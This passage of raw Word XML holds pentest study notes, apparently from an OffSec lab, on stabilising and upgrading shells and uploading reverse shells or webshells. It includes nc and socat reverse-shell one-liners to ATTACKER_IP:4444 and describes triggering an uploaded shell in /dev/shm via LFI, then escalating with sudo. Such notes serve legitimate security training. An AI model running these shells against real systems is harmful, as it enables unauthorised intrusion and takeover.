    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001011">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To test if </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">worked, it should not copy the commands when you use them. Like if you use "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it shouldn't echo that command. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001015">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Bash to stabilize (if python don't work):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script /dev/null -c bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001017">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if Perl exists:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="205"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which perl</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Run this command on the target to upgrade the shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000101F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'exec "/bin/bash";'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -e 'exec "/bin/sh";'</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001023">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using nc to stabilize (upon looking again, this seems to start a new reverse shell, not stabilize it):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1068"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -i | nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ATTACKER_IP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Socat:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001029">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat file:`tty`,raw,echo=0 tcp-listen:4444</w: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t xml:space="preserve">On the target machine (if socat is available):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000102D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1105"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444</w:t>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t xml:space="preserve">If socat is not installed, you can try to upload a static binary of socat to the target.</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001034">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kskxaui205ka" w:id="134"/>
      <w:bookmarkEnd w:id="134"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading reverse shells and webshells to websites</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.246</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we learned a VERY important technique. We had access to the machine via another account, but we wanted access to the account that was running the website (www-data). So we wanted to upload reverse shell and trigger it. We already had LFI, so we just had to upload and trigger it via LFI. We needed LFI since there was not upload function on the website, and we would have to use the other user account to upload to the machine directly (via terminal) and then find it using LFI</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BUT, when we uploaded reverse shell to /tmp, it the shell didn't work. This might because www-data doesn't have permissions to access /tmp. </w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SO, we should always upload to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is usually a directory that EVERYONE has access to, including www-data. So uploaded it there, accessed via LFI, and then got a shell. www-data ended up being able to use sudo for anything so we just ran sudo -i to get root!</w:t>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hyperlink r:id="rId333">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My favorite </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP webshell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ince it has a nice web interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="665"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I used in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia .249</w:t>
      </w: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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> When putting a reverse shell in a URL (like copy and pasting the one-liner into URL), if it doesn't work then try URL-encoding it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001048">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001049">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When uploading Reverse Shell (or doing one-liner rev shells in URL), if you have command execution, you can use the "which" command to see what is installed on the target machine. Like if they have python for example, then you know they can use python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1419"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quite different from a reverse shell. Web Shells provide an attacker with remote access to a web server. It is usually interacted with through HTTP requests, like in the URL. It doesn't require connecting back to the attacker's system, since the Web shell stays on the target's web server, and you interact with it through the target's web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Webshell collection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000104F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="333"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId334">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/TheBinitGhimire/Web-Shells</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001050">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some reverse shells and webshells are already included in Kali by default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001051">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/webshells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Includes directories like php and perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want the php rev shell, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /usr/share/webshells/php/php-reverse-shell.php .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001055">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001056">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this to edit the IP address and port </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001057">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
